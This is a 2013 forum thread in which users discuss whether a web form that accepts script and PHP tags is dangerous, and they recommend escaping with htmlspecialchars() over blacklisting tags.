Author Topic: Unfiltered form accepts <script> tag , it's dangerous ?  (Read 2898 times)

0 Members and 1 Guest are viewing this topic.

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
    • View Profile
Re: Unfiltered form accepts <script> tag , it's dangerous ?
« Reply #15 on: December 13, 2013, 11:46:12 pm »
What do you mean , how i'm supposed to run eval() if i cant enclose it at <?php tag ?

No. What I mean is that it is not directly dangerous to store PHP code in the database as it will not be executed if just print it to page. In order for that to be dangerous you will have to run the database result in the eval() function for it to execute.
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Offline invader7

  • /dev/null
  • *
  • Posts: 12
  • Cookies: 0
    • View Profile
Re: Unfiltered form accepts <script> tag , it's dangerous ?
« Reply #16 on: December 13, 2013, 11:52:44 pm »
No. What I mean is that it is not directly dangerous to store PHP code in the database as it will not be executed if just print it to page. In order for that to be dangerous you will have to run the database result in the eval() function for it to execute.


Yes :) ok thanks a lot !!!

Offline invader7

  • /dev/null
  • *
  • Posts: 12
  • Cookies: 0
    • View Profile
Re: Unfiltered form accepts <script> tag , it's dangerous ?
« Reply #17 on: December 14, 2013, 01:03:20 pm »


I think you're missing the idea here


Security should be designed into your software, not added in as an after thought. This whole "it doesnt matter its a quick fix now" ideology is stupid


Design the software with security in mind, dont design it to have security patched in later. It will not be as effective.

I think your thoughts are right , thanks !

You take input and sanitize it.



Lets say if you check for that string specifically... would it cover


<?php echo phpinfo(INFO_MODULES); ?> or any number of other ways it can be modified? how about every other way other tags can possibly be implemented? You dont strip entire bits of code... you strip santize what makes it code.


No this isn't dangerous because im searching for <?php , not the whole phpinfo()... so when i find <?php i make it <!--?php
« Last Edit: December 14, 2013, 01:03:41 pm by invader7 »

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
    • View Profile
Re: Unfiltered form accepts <script> tag , it's dangerous ?
« Reply #18 on: December 14, 2013, 02:44:31 pm »
Honestly you should just use htmlspecialchars() or htmlentities(), either on insert or on output from DB.
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Offline invader7

  • /dev/null
  • *
  • Posts: 12
  • Cookies: 0
    • View Profile
Re: Unfiltered form accepts <script> tag , it's dangerous ?
« Reply #19 on: December 15, 2013, 08:34:23 pm »
and youve obviously made sure short tags and such are disabled as well?


obviously yes :) you mean <? <?= , im searching for 2 characters <?  , something else in mind ?

Honestly you should just use htmlspecialchars() or htmlentities(), either on insert or on output from DB.


Yes you are right ! , its a targeted product for a closed group of people who are not supposed to hack it and its on production. But you are right , i will follow :)

The best way to write safer code is manage to bypass your own code and then improve it ;)
« Last Edit: December 15, 2013, 08:34:54 pm by invader7 »

Offline techb

  • Soy Sauce Feeler
  • Global Moderator
  • King
  • *
  • Posts: 2350
  • Cookies: 345
  • Aliens do in fact wear hats.
    • View Profile
    • github
Re: Unfiltered form accepts <script> tag , it's dangerous ?
« Reply #20 on: December 15, 2013, 09:03:07 pm »

Yes you are right ! , its a targeted product for a closed group of people who are not supposed to hack it and its on production. But you are right , i will follow :)



I was a "production" employee at an ISP tech support center, the amount of fail they had in there systems was epic. People like me, and people like in "production" WILL break things. Don't assume all others are stupid. I ran circles around the IT at my last job, and they all thought it was my supervisor. I quite on my own terms and my supervisor is still there, just don't underestimate the little guys. I did stuff to break systems in a few jobs I had, Lulz use putty again I DARE ya Mr telemarketer.

>>>import this
-----------------------------

Offline invader7

  • /dev/null
  • *
  • Posts: 12
  • Cookies: 0
    • View Profile
Re: Unfiltered form accepts <script> tag , it's dangerous ?
« Reply #21 on: December 15, 2013, 09:14:34 pm »

I was a "production" employee at an ISP tech support center, the amount of fail they had in there systems was epic. People like me, and people like in "production" WILL break things. Don't assume all others are stupid. I ran circles around the IT at my last job, and they all thought it was my supervisor. I quite on my own terms and my supervisor is still there, just don't underestimate the little guys. I did stuff to break systems in a few jobs I had, Lulz use putty again I DARE ya Mr telemarketer.


production = developement , sorry my mistake !! i wanted to write developement stage not production !!!